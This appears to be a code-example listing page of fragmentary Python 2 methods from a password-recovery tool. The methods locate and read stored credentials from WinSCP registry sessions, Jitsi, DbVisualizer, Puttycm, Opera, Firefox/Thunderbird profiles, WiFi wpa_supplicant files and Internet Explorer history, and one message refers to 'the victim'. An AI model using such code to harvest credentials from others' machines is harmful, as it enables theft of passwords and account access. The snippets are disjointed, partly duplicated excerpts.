            fd = open(self.filestr)
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
Exemple #41
0
 def get_logins_info(self):
     accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
     try:
         key = win32api.RegOpenKey(
             win32con.HKEY_CURRENT_USER,
             'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
     except Exception, e:
         print_debug('DEBUG', '{0}'.format(e))
         return False
Exemple #42
0
	def retrieve_password(self):
		# print the title
		Header().title_debug('Jitsi')
		
		file_properties = self.get_path()
		if file_properties == 'JITSI_NOT_EXISTS':
			print_debug('INFO', 'Jitsi not installed.')
		
		else:
			self.get_info(file_properties)
Exemple #43
0
    def run(self):
        # print the title
        Header().title_info('Jitsi')

        file_properties = self.get_path()
        if file_properties == 'JITSI_NOT_EXISTS':
            print_debug('INFO', 'Jitsi not installed.')

        else:
            self.get_info(file_properties)
Exemple #44
0
	def run(self, historic=''):
		# print title
		Header().title_info('Internet Explorer')
		
		# write the binary file
		try:
			self.write_binary_file()
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
Exemple #45
0
    def run(self):
        # print title
        Header().title_info('Puttycm')

        try:
            database_path = self.get_default_database()
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('INFO', 'Puttycm not installed')
            return
Exemple #46
0
def rev2self():
    global global_ref
    windll.advapi32.RevertToSelf()
    try:
        if global_ref is not None:
            windll.kernel32.CloseHandle(global_ref)
    except:
        pass
    global_ref=None
    print_debug('INFO', 'Running as: ' + GetUserName())
Exemple #47
0
 def check_winscp_installed(self):
     accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
     try:
         key = win32api.RegOpenKey(
             win32con.HKEY_CURRENT_USER,
             'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0,
             accessRead)
         return True
     except Exception, e:
         print_debug('DEBUG', '{0}'.format(e))
         return False
Exemple #48
0
    def run(self, historic=''):
        # print title
        Header().title_info('Internet Explorer')

        # write the binary file
        try:
            self.write_binary_file()
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug(
                'ERROR',
                '%s cannot be created, check your file permission' % dll_name)
Exemple #49
0
    def readBsddb(self, name):
        f = open(name, 'rb')

        #http://download.oracle.com/berkeley-db/db.1.85.tar.gz
        header = f.read(4 * 15)
        magic = self.getLongBE(header, 0)
        if magic != 0x61561:
            print_debug('WARNING', 'Bad magic number')
            return False
        version = self.getLongBE(header, 4)
        if version != 2:
            print_debug('WARNING', 'Bad version !=2 (1.85)')
            return False
        pagesize = self.getLongBE(header, 12)
        nkeys = self.getLongBE(header, 0x38)

        readkeys = 0
        page = 1
        nval = 0
        val = 1
        db1 = []
        while (readkeys < nkeys):
            f.seek(pagesize * page)
            offsets = f.read((nkeys + 1) * 4 + 2)
            offsetVals = []
            i = 0
            nval = 0
            val = 1
            keys = 0
            while nval != val:
                keys += 1
                key = self.getShortLE(offsets, 2 + i)
                val = self.getShortLE(offsets, 4 + i)
                nval = self.getShortLE(offsets, 8 + i)
                offsetVals.append(key + pagesize * page)
                offsetVals.append(val + pagesize * page)
                readkeys += 1
                i += 4
            offsetVals.append(pagesize * (page + 1))
            valKey = sorted(offsetVals)
            for i in range(keys * 2):
                f.seek(valKey[i])
                data = f.read(valKey[i + 1] - valKey[i])
                db1.append(data)
            page += 1
        f.close()
        db = {}

        for i in range(0, len(db1), 2):
            db[db1[i + 1]] = db1[i]

        return db
Exemple #50
0
    def run(self):
        Header().title_info('Wifi (from WPA Supplicant)')
        if self.check_file_access():
            return

        # check root access
        if os.getuid() != 0:
            print_debug('INFO',
                        'You need more privileges (run it with sudo)\n')
            return

        pwdFound = self.parse_file()
        print_output("wpa_supplicant", pwdFound)
Exemple #51
0
    def history_from_regedit(self):
        urls = []

        # open the registry
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
                                       accessRead)
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            return []
Exemple #52
0
    def get_path(self, software_name):
        if 'APPDATA' in os.environ:
            if software_name == 'Firefox':
                path = '%s\Mozilla\Firefox' % str(os.environ['APPDATA'])
            elif software_name == 'Thunderbird':
                path = '%s\Thunderbird' % str(os.environ['APPDATA'])
        else:
            print_debug(
                'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: <HOMEPATH>\Application Data\Mozilla\Firefox\Profiles\<PROFILE_NAME>'
            )
            return

        return path
Exemple #53
0
    def get_hash_table(self, list):
        # get the url list
        urls = self.get_history()
        urls = urls + list

        # calculate the hash for all urls found on the history
        hash_tables = []
        for u in range(len(urls)):
            try:
                h = (urls[u] + '\0').encode('UTF-16LE')
                hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()])
            except Exception, e:
                print_debug('DEBUG', '{0}'.format(e))
Exemple #54
0
	def get_dic_file(self, dictionary_path):
		words = []
		if dictionary_path:
			try:
				dicFile = open (dictionary_path,'r')
			except Exception,e:
				print_debug('DEBUG', '{0}'.format(e))
				print_debug('ERROR', 'Unable to open passwords file: %s' % str(dictionary_path))
				return []
			
			for word in dicFile.readlines():
				words.append(word.strip('\n'))
			dicFile.close()
Exemple #55
0
	def run(self):
		# print the title
		Header().title_debug('DbVisualizer')

		mainPath = self.get_mainPath()

		if mainPath == 'DBVIS_NOT_EXISTS':
			print_debug('INFO', 'DbVisualizer not installed.')

		else:
			passphrase = self.get_passphrase()

			salt = self.get_salt()
			self.get_infos(mainPath, passphrase, salt)
Exemple #56
0
    def run(self):
        # print title
        Header().title_info('Jitsi')

        file_properties = self.get_path()
        if file_properties == 'Error':
            print_debug('ERROR',
                        'The APPDATA environment variable is not defined')

        elif file_properties == 'JITSI_NOT_EXISTS':
            print_debug('INFO', 'Jitsi not installed.')

        else:
            self.get_info(file_properties)
Exemple #57
0
    def masterPasswordUsed(self, path):

        # the init file is not well defined so lines have to be removed before to parse it
        cp = RawConfigParser()
        f = open(path + os.sep + 'operaprefs.ini', 'rb')

        f.readline()  # discard first line
        while 1:
            try:
                cp.readfp(f)
                break
            except Exception, e:
                print_debug('DEBUG', '{0}'.format(e))
                f.readline()  # discard first line